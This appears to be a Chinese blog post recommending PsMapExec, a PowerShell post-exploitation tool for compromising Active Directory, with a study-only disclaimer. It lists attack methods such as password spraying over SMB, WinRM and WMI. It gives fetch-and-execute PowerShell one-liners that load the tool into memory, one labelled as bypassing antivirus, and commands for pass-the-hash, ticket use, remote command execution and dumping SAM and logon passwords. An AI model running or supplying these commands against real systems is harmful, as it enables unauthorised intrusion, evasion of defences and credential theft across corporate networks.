正文

工具推荐|Powershell版CrackMapExec

admin
admin V管理员 /0 评论 /118 阅读
0215
此篇文章发布距今已超过282天,您需要注意文章的内容或图片是否可用!

点击上方[蓝字],关注我们

免责声明

本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者及本公众号团队不为此承担任何责任。

文章正文

一款 PowerShell 工具,深受流行工具 CrackMapExec 的启发。我经常发现自己在无法访问 Linux 的情况下才能使用 CrackMapExec。

PsMapExec 用作后利用工具来评估和破坏 Active Directory 环境。

支持哪些方法

当前支持的方法(协议)

  • RDP

  • SessionHunter

  • SMB

  • SMB Signing

  • Spraying (Hash, Password, EmptyPassword and AccountAsPassword)

  • VNC

  • WinRM

  • WMI

计划方法

  • MSSQL (In testing)

  • IPMI

  • SNMP (In testing)

  • FTP

  • SSH

用法

将脚本直接加载到内存中(绕过 AV)

IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PME-Scripts/main/Invoke-NETMongoose.ps1");IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1")

将脚本直接加载到内存中

IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1")

身份验证类型

# Current userPsMapExec -Targets All -Method [Method]# With PasswordPsMapExec -Targets All -Method [Method] -Username [Username] -Password [Password]# With HashPsMapExec -Targets All -Method [Method] -Username [Username] -Hash [RC4/AES256]# With TicketPsMapExec -Targets All -Method [Method] -Ticket [doI.. OR Path to ticket file]# Local Authentication (WMI only)PsMapExec -Targets All -Method WMI -LocalAuth

命令执行

当前支持的所有命令执行方法都支持 -Command 参数。命令参数可以附加到上述身份验证类型中,以作为指定用户或当前用户执行给定命令。

PsMapExec -Targets All -Method [Method] -Command [Command]

SAM

LogonPasswords

Ticket Dump

GenRelayList / SMB Signing

详细用户见手册

下载地址

进入公众号

回复【231101】获取下载链接

技术交流


推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
宙飒天下